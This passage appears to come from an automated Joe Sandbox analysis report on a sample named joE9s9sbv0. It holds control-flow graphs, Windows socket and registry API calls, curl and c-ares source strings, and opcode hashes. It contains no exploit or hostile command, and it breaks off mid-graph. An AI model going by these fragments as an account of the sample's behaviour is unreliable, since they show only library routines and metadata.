                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                • String ID: 0$Alw
                                • API String ID: 2406880114-1042436145
                                • Opcode ID: 8a019a474659ddb7ae88e01e594e1d670c7f9e9fa303dcb9ce733c60757fe7e6
                                • Instruction ID: 3f86a4ece295578cb5f5d3ca41fed63ad05ed3f6fc98e4899536d894e1f09a8b
                                • Opcode Fuzzy Hash: 8a019a474659ddb7ae88e01e594e1d670c7f9e9fa303dcb9ce733c60757fe7e6
                                • Instruction Fuzzy Hash: 10E105B09047059FDB40EF68D9856ADBBF5AF88344F10887EE898D7354E7789988CF42

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1538 1e05b0-1e05b7 1539 1e07ee 1538->1539 1540 1e05bd-1e05d4 1538->1540 1541 1e05da-1e05e6 1540->1541 1542 1e07e7-1e07ed 1540->1542 1541->1542 1543 1e05ec-1e05f0 1541->1543 1542->1539 1544 1e05f6-1e0620 call 1e7350 call 1d70b0 1543->1544 1545 1e07c7-1e07cc 1543->1545 1550 1e066a-1e068c call 20dec0 1544->1550 1551 1e0622-1e0624 1544->1551 1545->1542 1557 1e07d6-1e07e3 call 1e7380 1550->1557 1558 1e0692-1e06a0 1550->1558 1553 1e0630-1e0655 call 1d70d0 call 1e03c0 call 1e7450 1551->1553 1578 1e07ce 1553->1578 1579 1e065b-1e0668 call 1d70e0 1553->1579 1557->1542 1561 1e06f4-1e06f6 1558->1561 1562 1e06a2-1e06a4 1558->1562 1564 1e07ef-1e082b call 1e3000 1561->1564 1565 1e06fc-1e06fe 1561->1565 1567 1e06b0-1e06e4 call 1e73b0 1562->1567 1582 1e0a2f-1e0a35 1564->1582 1583 1e0831-1e0837 1564->1583 1569 1e072c-1e0754 1565->1569 1567->1557 1577 1e06ea-1e06ee 1567->1577 1573 1e075f-1e078b 1569->1573 1574 1e0756-1e075b 1569->1574 1595 1e0700-1e0703 1573->1595 1596 1e0791-1e0796 1573->1596 1580 1e075d 1574->1580 1581 1e0707-1e0719 WSAEventSelect 1574->1581 1577->1567 1584 1e06f0 1577->1584 1578->1557 1579->1550 1579->1553 1589 1e0723-1e0726 1580->1589 1581->1557 1588 1e071f 1581->1588 1585 1e0a3c-1e0a52 1582->1585 1586 1e0a37-1e0a3a 1582->1586 1591 1e0839-1e0842 call 1e6fa0 1583->1591 1592 1e0861-1e087e 1583->1592 1584->1561 1585->1557 1593 1e0a58-1e0a81 call 1e2f10 1585->1593 1586->1585 1588->1589 1589->1564 1589->1569 1601 1e0847-1e084c 1591->1601 1605 1e0882-1e088d 1592->1605 1593->1557 1611 1e0a87-1e0a97 call 1e6df0 1593->1611 1595->1581 1596->1595 1600 1e079c-1e07c2 call 1d76a0 1596->1600 1600->1595 1603 1e0a9c-1e0aa4 1601->1603 1604 1e0852 1601->1604 1603->1557 1604->1592 1608 1e0854-1e085f 1604->1608 1609 1e0893-1e08b1 1605->1609 1610 1e0970-1e0975 1605->1610 1608->1605 1614 1e08c8-1e08f7 1609->1614 1612 1e097b-1e0989 call 1d70b0 1610->1612 1613 1e0a19-1e0a2c 1610->1613 1611->1557 1612->1613 1621 1e098f-1e099e 1612->1621 1613->1582 1622 1e08fd-1e0925 1614->1622 1623 1e08f9-1e08fb 1614->1623 1624 1e09b0-1e09c1 call 1d70d0 1621->1624 1625 1e0928-1e093f 1622->1625 1623->1625 1631 1e09c3-1e09c7 1624->1631 1632 1e09a0-1e09ae call 1d70e0 1624->1632 1629 1e0945-1e096b 1625->1629 1630 1e08b3-1e08c2 1625->1630 1629->1630 1630->1610 1630->1614 1634 1e09e8-1e0a03 WSAEnumNetworkEvents 1631->1634 1632->1613 1632->1624 1636 1e0a05-1e0a17 1634->1636 1637 1e09d0-1e09e6 WSAEventSelect 1634->1637 1636->1637 1637->1632 1637->1634
                                APIs
                                • WSAEventSelect.WS2_32(?,8508C483,?), ref: 001E0711
                                • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 001E09DD
                                • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 001E09FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: EventSelect$EnumEventsNetwork
                                • String ID: multi.c
                                • API String ID: 2170980988-214371023
                                • Opcode ID: cd8a546aa95b94684d7af2120f73e42e326a6bc4d0d893fc540446ab0409547c
                                • Instruction ID: a0acb316779dbc68a1a52cc32cf3e21c0ced0df1c0b10b3c18da8ac027ed3f0c
                                • Opcode Fuzzy Hash: cd8a546aa95b94684d7af2120f73e42e326a6bc4d0d893fc540446ab0409547c
                                • Instruction Fuzzy Hash: 9FD1C275A087819FE712CF65C881B6F77E5FF98348F04482DF88586282E7B4E985CB52

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1656 29b180-29b195 1657 29b19b-29b1a2 1656->1657 1658 29b3e0-29b3e7 1656->1658 1659 29b1b0-29b1b9 1657->1659 1659->1659 1660 29b1bb-29b1bd 1659->1660 1660->1658 1661 29b1c3-29b1d0 1660->1661 1663 29b3db 1661->1663 1664 29b1d6-29b1f2 1661->1664 1663->1658 1665 29b229-29b22d 1664->1665 1666 29b3e8-29b417 1665->1666 1667 29b233-29b246 1665->1667 1675 29b41d-29b429 1666->1675 1676 29b582-29b589 1666->1676 1668 29b248-29b24b 1667->1668 1669 29b260-29b264 1667->1669 1670 29b24d-29b256 1668->1670 1671 29b215-29b223 1668->1671 1673 29b269-29b286 call 29af30 1669->1673 1670->1673 1671->1665 1674 29b315-29b33c call 558b00 1671->1674 1684 29b288-29b2a3 call 29b060 1673->1684 1685 29b2f0-29b301 1673->1685 1687 29b3bf-29b3ca 1674->1687 1688 29b342-29b347 1674->1688 1679 29b42b-29b433 call 29b590 1675->1679 1680 29b435-29b44c call 29b590 1675->1680 1679->1680 1696 29b458-29b471 call 29b590 1680->1696 1697 29b44e-29b456 call 29b590 1680->1697 1703 29b2a9-29b2c7 getsockname call 29b020 1684->1703 1704 29b200-29b213 call 29b020 1684->1704 1685->1671 1700 29b307-29b310 1685->1700 1698 29b3cc-29b3d9 1687->1698 1693 29b349-29b358 1688->1693 1694 29b384-29b38f 1688->1694 1701 29b360-29b382 1693->1701 1694->1687 1702 29b391-29b3a5 1694->1702 1712 29b48c-29b4a7 1696->1712 1713 29b473-29b487 1696->1713 1697->1696 1698->1658 1700->1698 1701->1694 1701->1701 1708 29b3b0-29b3bd 1702->1708 1714 29b2cc-29b2dd 1703->1714 1704->1671 1708->1687 1708->1708 1716 29b4a9-29b4b1 call 29b660 1712->1716 1717 29b4b3-29b4cb call 29b660 1712->1717 1713->1676 1714->1671 1718 29b2e3 1714->1718 1716->1717 1723 29b4d9-29b4f5 call 29b660 1717->1723 1724 29b4cd-29b4d5 call 29b660 1717->1724 1718->1700 1729 29b50d-29b52b call 29b770 * 2 1723->1729 1730 29b4f7-29b50b 1723->1730 1724->1723 1729->1676 1735 29b52d-29b531 1729->1735 1730->1676 1736 29b580 1735->1736 1737 29b533-29b53b 1735->1737 1736->1676 1738 29b578-29b57e 1737->1738 1739 29b53d-29b547 1737->1739 1738->1676 1739->1738 1740 29b549-29b54d 1739->1740 1740->1738 1741 29b54f-29b558 1740->1741 1741->1738 1742 29b55a-29b576 call 29b870 * 2 1741->1742 1742->1676 1742->1738
                                APIs
                                • getsockname.WS2_32(-00000020,-00000020,?), ref: 0029B2B6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: getsockname
                                • String ID: ares__sortaddrinfo.c$cur != NULL
                                • API String ID: 3358416759-2430778319
                                • Opcode ID: 7b043eb175a39f1f35e413007c7b26073329c991a9a5c17ca2d5f1c10cfea12e
                                • Instruction ID: 5cb721ef8bd7d839c2fe6c28d228dba4f92a89b4f02db77690bc9ccee2a43266
                                • Opcode Fuzzy Hash: 7b043eb175a39f1f35e413007c7b26073329c991a9a5c17ca2d5f1c10cfea12e
                                • Instruction Fuzzy Hash: 7DC19E316143059FDF19DF24DA90A6A77E1FF88704F45896CE8498B3A1DB30ED65CB81
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a060ac8d22658b8df05f1b371fe8f3dd7a289d359ec924f02fc546c16892594c
                                • Instruction ID: f9121a11d0bbfd19a816a6ed0c514c02ebd5a56939bd8203faf6d5ed53c6dc89
                                • Opcode Fuzzy Hash: a060ac8d22658b8df05f1b371fe8f3dd7a289d359ec924f02fc546c16892594c
                                • Instruction Fuzzy Hash: D191143060CB8A8BE7358B2A98947BFB2D5FFC5760F148B2CE899431D4EB709D40D691
                                APIs
                                • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0028712E,?,?,?,00001001,00000000), ref: 0029A90D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: recvfrom
                                • String ID:
                                • API String ID: 846543921-0
                                • Opcode ID: dd41d3f27a39093d5b3e2a1331f6e4dceff417f883427d92ab55467b578a78e5
                                • Instruction ID: 370aa72731ea114ea777bd851aa1866bf374fd4919fb57944abe46199e4b1f9c
                                • Opcode Fuzzy Hash: dd41d3f27a39093d5b3e2a1331f6e4dceff417f883427d92ab55467b578a78e5
                                • Instruction Fuzzy Hash: F7F06D75118308AFE6109E01DC48D6BBBEDFFC9758F05496DF948232118270AE10CAB2
                                APIs
                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0028A499
                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0028A4FB
                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0028A531
                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0028AA19
                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0028AA4C
                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0028AA97
                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0028AAE9
                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0028AB30
                                • RegCloseKey.KERNELBASE(?), ref: 0028AB6A
                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0028AB82
                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0028AC46
                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0028AD0A
                                • RegEnumKeyExA.KERNELBASE ref: 0028AD8D
                                • RegCloseKey.KERNELBASE(?), ref: 0028ADD9
                                • RegEnumKeyExA.KERNELBASE ref: 0028AE08
                                • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0028AE2A
                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0028AE54
                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0028AF63
                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0028AFB2
                                • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0028B072
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                • API String ID: 4281207131-1047472027
                                • Opcode ID: 41e255e41d08f9c894228c137e09ed546e9faa8d4d6358d5fb52964c03f437db
                                • Instruction ID: 8c8c7b2b071efc72a9b2c4c82e6e6b88f307d8fe6f37901028d7955fd267fc52
                                • Opcode Fuzzy Hash: 41e255e41d08f9c894228c137e09ed546e9faa8d4d6358d5fb52964c03f437db
                                • Instruction Fuzzy Hash: 0C72E0B5625302ABF710AF24CC85B6B7BE8AF84700F144829F985D72D1EB75E854CB93
                                APIs
                                • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0020A831
                                Strings
                                • cf_socket_open() -> %d, fd=%d, xrefs: 0020A796
                                • Local Interface %s is ip %s using address family %i, xrefs: 0020AE60
                                • Bind to local port %d failed, trying next, xrefs: 0020AFE5
                                • bind failed with errno %d: %s, xrefs: 0020B080
                                • Trying %s:%d..., xrefs: 0020A7C2, 0020A7DE
                                • Could not set TCP_NODELAY: %s, xrefs: 0020A871
                                • @, xrefs: 0020A8F4
                                • Name '%s' family %i resolved to '%s' family %i, xrefs: 0020ADAC
                                • cf-socket.c, xrefs: 0020A5CD, 0020A735
                                • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0020A6CE
                                • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0020AD0A
                                • Trying [%s]:%d..., xrefs: 0020A689
                                • Couldn't bind to '%s' with errno %d: %s, xrefs: 0020AE1F
                                • @, xrefs: 0020AC42
                                • Local port: %hu, xrefs: 0020AF28
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: setsockopt
                                • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                • API String ID: 3981526788-2373386790
                                • Opcode ID: 2fd195266a5a3dd9a76dcf85da76e9a61ab2296e0df987a99f3dc9fc249a70dd
                                • Instruction ID: f3cd0d97d880503622d8a3e6e4b9a4aa7625cd1e988549f68e9e7fed84199dc3
                                • Opcode Fuzzy Hash: 2fd195266a5a3dd9a76dcf85da76e9a61ab2296e0df987a99f3dc9fc249a70dd
                                • Instruction Fuzzy Hash: 50620571514382ABE720CF24C846BABB3F4BF94304F444929F988972D2E771E865CB93

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 856 299740-29975b 857 29975d-299768 call 2978a0 856->857 858 299780-299782 856->858 867 2999bb-2999c0 857->867 868 29976e-299770 857->868 859 299788-2997a0 call 558e00 call 2978a0 858->859 860 299914-29994e call 558b70 RegOpenKeyExA 858->860 859->867 874 2997a6-2997c5 859->874 871 29995a-299992 RegQueryValueExA RegCloseKey call 558b98 860->871 872 299950-299955 860->872 869 299a0c-299a15 867->869 873 299772-29977e 868->873 868->874 886 299997-2999b5 call 2978a0 871->886 872->869 873->859 879 299827-299833 874->879 880 2997c7-2997e0 874->880 882 29985f-299872 call 295ca0 879->882 883 299835-29985c call 28e2b0 * 2 879->883 884 2997e2-2997f3 call 558b50 880->884 885 2997f6-299809 880->885 896 299878-29987d call 2977b0 882->896 897 2999f0 882->897 883->882 884->885 885->879 895 29980b-299810 885->895 886->867 886->874 895->879 899 299812-299822 895->899 903 299882-299889 896->903 902 2999f5-2999fb call 295d00 897->902 899->869 911 2999fe-299a09 902->911 903->902 907 29988f-29989b call 284fe0 903->907 907->897 915 2998a1-2998c3 call 558b50 call 2978a0 907->915 911->869 920 2998c9-2998db call 28e2d0 915->920 921 2999c2-2999ed call 28e2b0 * 2 915->921 920->921 926 2998e1-2998f0 call 28e2d0 920->926 921->897 926->921 931 2998f6-299905 call 2963f0 926->931 936 29990b-29990f 931->936 937 299f66-299f7f call 295d00 931->937 939 299a3f-299a5a call 296740 call 2963f0 936->939 937->911 939->937 945 299a60-299a6e call 296d60 939->945 948 299a1f-299a39 call 296840 call 2963f0 945->948 949 299a70-299a94 call 296200 call 2967e0 call 296320 945->949 948->937 948->939 960 299a16-299a19 949->960 961 299a96-299ac6 call 28d120 949->961 960->948 962 299fc1 960->962 967 299ac8-299adb call 28d120 961->967 968 299ae1-299af7 call 28d190 961->968 964 299fc5-299ffd call 295d00 call 28e2b0 * 2 962->964 964->911 967->948 967->968 968->948 974 299afd-299b09 call 284fe0 968->974 974->962 980 299b0f-299b29 call 28e730 974->980 985 299b2f-299b3a call 2978a0 980->985 986 299f84-299f88 980->986 985->986 993 299b40-299b54 call 28e760 985->993 988 299f95-299f99 986->988 990 299f9b-299f9e 988->990 991 299fa0-299fb6 call 28ebf0 * 2 988->991 990->962 990->991 1003 299fb7-299fbe 991->1003 999 299f8a-299f92 993->999 1000 299b5a-299b6e call 28e730 993->1000 999->988 1006 299b8c-299b97 call 2963f0 1000->1006 1007 299b70-29a004 1000->1007 1003->962 1015 299c9a-299cab call 28ea00 1006->1015 1016 299b9d-299bbf call 296740 call 2963f0 1006->1016 1012 29a015-29a01d 1007->1012 1013 29a01f-29a022 1012->1013 1014 29a024-29a045 call 28ebf0 * 2 1012->1014 1013->964 1013->1014 1014->964 1023 299f31-299f35 1015->1023 1024 299cb1-299ccd call 28ea00 call 28e960 1015->1024 1016->1015 1034 299bc5-299bda call 296d60 1016->1034 1028 299f40-299f61 call 28ebf0 * 2 1023->1028 1029 299f37-299f3a 